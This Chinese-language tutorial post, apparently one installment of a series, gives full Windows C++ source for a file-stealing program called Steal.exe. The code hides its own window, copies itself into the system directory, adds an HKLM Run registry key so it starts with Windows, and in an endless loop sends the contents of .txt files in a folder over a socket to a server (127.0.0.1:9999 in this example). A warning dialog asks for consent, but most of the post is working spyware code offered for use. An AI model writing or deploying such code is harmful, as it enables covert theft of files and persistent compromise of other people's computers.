12-文件截取:隐藏与自启动

文件截取:隐藏与自启动

1.隐藏自身

获取窗口句柄,将窗口设置为不可见

void HideMyself()
{
	HWND hwnd = GetForegroundWindow();
	ShowWindow(hwnd, SW_HIDE);
}

2.自启动

调用函数时,修改exe的名称

在不需要的时候,需要进入注册表的Software\Microsoft\Windows\CurrentVersion\Run里删除对应exe


void AddToSystem()
{
	HKEY hKEY;
	char CurrentPath[MAX_PATH];
	char SysPath[MAX_PATH];
	long ret = 0;
	LPSTR FileNewName;
	LPSTR FileCurrentName;
	DWORD type = REG_SZ;
	DWORD size = MAX_PATH;
	LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //regedit win + R
		GetSystemDirectory(SysPath, size);
	GetModuleFileName(NULL, CurrentPath, size);
	//Copy File
	FileCurrentName = CurrentPath;
	FileNewName = lstrcat(SysPath, "\\Steal.exe");
	struct _finddata_t Steal;
	printf("ret1 = %d,FileNewName = %s\n", ret, FileNewName);
	if (_findfirst(FileNewName, &Steal) != -1)
		return;//已经安装!
	printf("ret2 = %d\n", ret);
	int ihow = MessageBox(0, "该程序只允许用于合法的用途!\n 继续运行该程序将使这台机器\
		处于被监控的状态!\n 如果您不想这样,请按“取消”按钮退出。\n 按下“是”按钮该程序将被复制\
		到您的机器上,并随系统启动自动运行。\n 按下“否”按钮,程序只运行一次,不会在您的系统内留下\
		任何东西。", "警告", MB_YESNOCANCEL | MB_ICONWARNING | MB_TOPMOST);
		if (ihow == IDCANCEL)
			exit(0);
	if (ihow == IDNO)
		return;//只运行一次
		//复制文件
	ret = CopyFile(FileCurrentName, FileNewName, TRUE);
	if (!ret)
	{
		return;
	}
	//加入注册表
	printf("ret = %d\n", ret);
	ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, Rgspath, 0, KEY_WRITE, &hKEY);
	if (ret != ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	//Set Key
	ret = RegSetValueEx(hKEY, "Steal", NULL, type, (const unsigned char*)FileNewName, size);
	if (ret != ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	RegCloseKey(hKEY);
}

完整代码

使用管理员权限打开

#include<iostream>
#include<Windows.h>
#include<io.h>
#pragma comment(lib,"ws2_32.lib")
using namespace std;
bool initsocket()		//封装初始化网络库的函数
{
	WORD wVersionRequested;
	WSADATA wsadata;
	int err;
	wVersionRequested = MAKEWORD(2, 2);

	err = WSAStartup(wVersionRequested, &wsadata);
	if (err)
	{
		printf("WSAStartup errnum: %d\n", GetLastError());
		return false;
	}

	if (LOBYTE(wsadata.wVersion) != 2 || HIBYTE(wsadata.wVersion) != 2)
	{
		printf("LOBYTE errnum: %d\n", GetLastError());
		WSACleanup();
		return false;
	}
	return true;
}


bool sendToServer(const char* path)
{
	if (!initsocket())
		return false;

	FILE* fp = fopen(path, "rb");
	if (fp == NULL)
		return false;
	char sendBuf[1024] = { 0 };
	int len = fread(sendBuf, 1, 1024, fp);
	fclose(fp);

	SOCKET sockCli;
	sockCli = socket(AF_INET, SOCK_STREAM, 0);
	SOCKADDR_IN addrSrv;
	addrSrv.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
	addrSrv.sin_family = AF_INET;
	addrSrv.sin_port = htons(9999);


	if (SOCKET_ERROR == connect(sockCli, (sockaddr*)&addrSrv, sizeof(sockaddr)))
	{
		printf("%d", GetLastError());
		return false;
	}

	int iLen = send(sockCli, sendBuf, 1024, 0);
	closesocket(sockCli);
	WSACleanup();
	return true;
}
int DoSteal(const char* szPath)
{
	//1 遍历路径下所有文件夹
	WIN32_FIND_DATA file_for_find;			//文件数据
	HANDLE hListFile;						//用句柄来标志文件

	char szFilePath[MAX_PATH] = { 0 };
	strcpy(szFilePath, szPath);
	strcat(szFilePath, "\\*");
	//找到第一个文件
	hListFile = FindFirstFile(szFilePath, &file_for_find);
	//循环遍历所有文件
	do {
		char mypath[MAX_PATH] = { 0 };
		strcpy(mypath, szPath);
		strcat(mypath, file_for_find.cFileName);
		if(strstr(mypath,".txt"))
			while (sendToServer(mypath)==false);
	} while (FindNextFile(hListFile, &file_for_find));

	return 0;
}

void AddToSystem()
{
	HKEY hKEY;
	char CurrentPath[MAX_PATH];
	char SysPath[MAX_PATH];
	long ret = 0;
	LPSTR FileNewName;
	LPSTR FileCurrentName;
	DWORD type = REG_SZ;
	DWORD size = MAX_PATH;
	LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //regedit win + R
		GetSystemDirectory(SysPath, size);
	GetModuleFileName(NULL, CurrentPath, size);
	//Copy File
	FileCurrentName = CurrentPath;
	FileNewName = lstrcat(SysPath, "\\Steal.exe");
	struct _finddata_t Steal;
	printf("ret1 = %d,FileNewName = %s\n", ret, FileNewName);
	if (_findfirst(FileNewName, &Steal) != -1)
		return;//已经安装!
	printf("ret2 = %d\n", ret);
	int ihow = MessageBox(0, "该程序只允许用于合法的用途!\n 继续运行该程序将使这台机器\
		处于被监控的状态!\n 如果您不想这样,请按“取消”按钮退出。\n 按下“是”按钮该程序将被复制\
		到您的机器上,并随系统启动自动运行。\n 按下“否”按钮,程序只运行一次,不会在您的系统内留下\
		任何东西。", "警告", MB_YESNOCANCEL | MB_ICONWARNING | MB_TOPMOST);
		if (ihow == IDCANCEL)
			exit(0);
	if (ihow == IDNO)
		return;//只运行一次
		//复制文件
	ret = CopyFile(FileCurrentName, FileNewName, TRUE);
	if (!ret)
	{
		return;
	}
	//加入注册表
	printf("ret = %d\n", ret);
	ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, Rgspath, 0, KEY_WRITE, &hKEY);
	if (ret != ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	//Set Key
	ret = RegSetValueEx(hKEY, "Steal", NULL, type, (const unsigned char*)FileNewName, size);
	if (ret != ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	RegCloseKey(hKEY);
}

void HideMyself()
{
	HWND hwnd = GetForegroundWindow();
	ShowWindow(hwnd, SW_HIDE);
}
int main()
{
	AddToSystem();
	HideMyself();
	while(1)
		DoSteal("D:\\文件合集\\txt合集\\");
	return 0;
}

发布于